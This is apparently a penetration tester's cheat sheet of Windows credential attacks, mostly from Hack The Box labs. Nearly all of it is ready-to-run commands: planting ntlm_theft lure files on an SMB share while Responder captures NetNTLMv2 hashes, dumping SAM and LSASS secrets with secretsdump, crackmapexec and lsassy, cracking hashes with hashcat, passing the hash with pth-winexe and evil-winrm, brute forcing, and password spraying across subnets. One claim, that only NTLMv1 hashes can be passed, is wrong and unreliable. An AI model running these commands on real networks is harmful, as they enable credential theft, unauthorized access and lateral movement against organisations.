NTLM Hashes

Capture NetNTLMv2 by writting on a samba share

NTLM Theft

python ntlm_theft.py -g all -s 10.10.14.6 -f filename
IP of the attacker machine

Upload all of the files to the share

smbclient //flight.htb/shared -U USER 'PASS'
smb: \> prompt false
smb: \> mput *

Have responder listening for connections

responder -I eth0 -rdwv

Dumping SAM Hashes with secretsdump.py

https://github.com/SecureAuthCorp/impacket

secretsdump.py DOMAIN/USERNAME:PASSWORD@IP

with a valid hash

secretsdump.py administrator@192.168.1.2 -hashes adwad2241...:7df4fbesf...

Ignore Guest, DefaultAccount and WDAGUtilityAccount

Cracking NTLM Hashes with Hashcat

On Windows

hashcat64.exe -m 1000 hashfile.txt rockyou.txt -O

Pass the hash

You can only pass NTLM V1 hashes

pth-winexe -U Administrator%LMHASH:NTLMHASH //IP cmd

crackmapexec smb IP -u "USERNAME" -H HASH --local-auth

CrackMapExec

Brute Force

crackmapexec smb 10.10.10.184 -u USER_LIST -p pass.txt

List shares

crackmapexec smb 10.10.10.184 -u USER -p PASSWORD --shares

List users

crackmapexec smb 10.10.10.184 -u USER -p PASSWORD --users

Sweep a subnet using a Pass attack

crackmapexec smb 192.168.138.0/24 -u fcastle -d MARVEL.local -p Password

Using a hash instead

crackmapexec smb 192.168.138.0/24 -u administrator -H aadwaudfbwaufg382:7faceafawf --local-auth

In order to dump SAM hashes

crackmapexec smb 192.168.138.0/24 -u administrator -H aadwaudfbwaufg382:7faceafawf --local-auth --sam

Run lsassy to dumpsecrets stored in memory

crackmapexec smb 192.168.138.0/24 -u administrator -H aadwaudfbwaufg382:7faceafawf --local-auth -M lsassy

Pass the hash (PtH)

crackmapexec smb 10.129.95.210 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6 -d htb.local -x "dir C:\Users\Administrator\Desktop"
evil-winrm u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6 -i 10.129.95.210
evil-winrm -i 10.10.10.161 -u administrator -p aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

Null authentication

crackmapexec smb 10.10.10.184 --pass-pol -u '' -p ''

Test credentials on local network (password spraying)

crackmapexec 192.168.57.0/24 -u USERNAME -d DOMAIN.local -p PASSWORD